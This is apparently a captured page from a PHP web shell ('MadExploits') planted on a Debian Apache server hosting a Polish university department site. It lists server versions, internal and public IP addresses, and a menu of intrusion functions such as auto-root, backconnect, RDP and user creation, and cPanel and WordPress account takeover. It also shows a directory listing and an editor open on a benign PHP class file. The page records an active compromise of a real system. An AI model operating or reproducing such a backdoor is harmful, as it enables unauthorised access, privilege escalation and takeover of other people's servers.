Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.137.159.163
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
protected /
Common /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
KAdminPage.php
346
B
-rw-r--r--
KApplication.php
313
B
-rw-r--r--
KAuthor.php
1.3
KB
-rw-r--r--
KBooleanColumn.php
1.57
KB
-rw-r--r--
KClass.php
1.85
KB
-rw-r--r--
KClassGiver.php
1.04
KB
-rw-r--r--
KClassMaterialFile.php
2.81
KB
-rw-r--r--
KContentItem.php
3.3
KB
-rw-r--r--
KDuty.php
2.82
KB
-rw-r--r--
KImage.php
7.01
KB
-rw-r--r--
KImageManager.php
1.73
KB
-rw-r--r--
KNewsItem.php
4.27
KB
-rw-r--r--
KPage.php
1.96
KB
-rw-r--r--
KPaper.php
13.62
KB
-rw-r--r--
KRightBox.php
2.82
KB
-rw-r--r--
KScheduleEntry.php
3.67
KB
-rw-r--r--
KUser.php
1.55
KB
-rw-r--r--
KUserRecord.php
10.87
KB
-rw-r--r--
PEmailer.php
445
B
-rw-r--r--
PErrorHandler.php
4.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : KClass.php
<?php class KClass extends TActiveRecord { const TABLE='ifk_classcatalog'; const GROUP_1ST_YEAR = 11; const GROUP_2ND_YEAR = 12; const GROUP_3RD_YEAR = 13; const GROUP_4TH_YEAR_CLASSIC = 14; const GROUP_5TH_YEAR_CLASSIC = 15; const GROUP_4TH_YEAR_NEOLATIN = 20; const GROUP_5TH_YEAR_NEOLATIN = 21; const GROUP_FACS = 32; const GROUP_DOC = 50; static $_group_names = array( self::GROUP_1ST_YEAR => 'studia I stopnia - rok I', self::GROUP_2ND_YEAR => 'studia I stopnia - rok II', self::GROUP_3RD_YEAR => 'studia I stopnia - rok III', self::GROUP_4TH_YEAR_CLASSIC => 'studia II stopnia, I rok specjalizacja klasyczna', self::GROUP_5TH_YEAR_CLASSIC => 'studia II stopnia, II rok specjalizacja klasyczna ', self::GROUP_4TH_YEAR_NEOLATIN => 'studia II stopnia, I rok specjalizacja neolatynistyczna', self::GROUP_5TH_YEAR_NEOLATIN => 'studia II stopnia, II rok specjalizacja neolatynistyczna', self::GROUP_FACS => 'zajęcia dodatkowe', self::GROUP_DOC => 'zajęcia dla doktorantów' ); private $_id; private $_name; private $_group_id; public function getId() {return $this->_id;} public function setId($value) {$this->_id = TPropertyValue::ensureInteger($value);} public function getName() {return $this->_name;} public function setName($value) {$this->_name = TPropertyValue::ensureString($value);} public function getGroup_id() {return $this->_group_id;} public function setGroup_id($value) {$this->_group_id = TPropertyValue::ensureInteger($value);} public function getUrl() { return Prado::getApplication()->getService()->constructUrl('Front.ClassDetails', array('cid'=>$this->id, 'name'=>KPage::urlify($this->getName()))); } public static function finder($className=__CLASS__) { return parent::finder($className); } } ?>
Close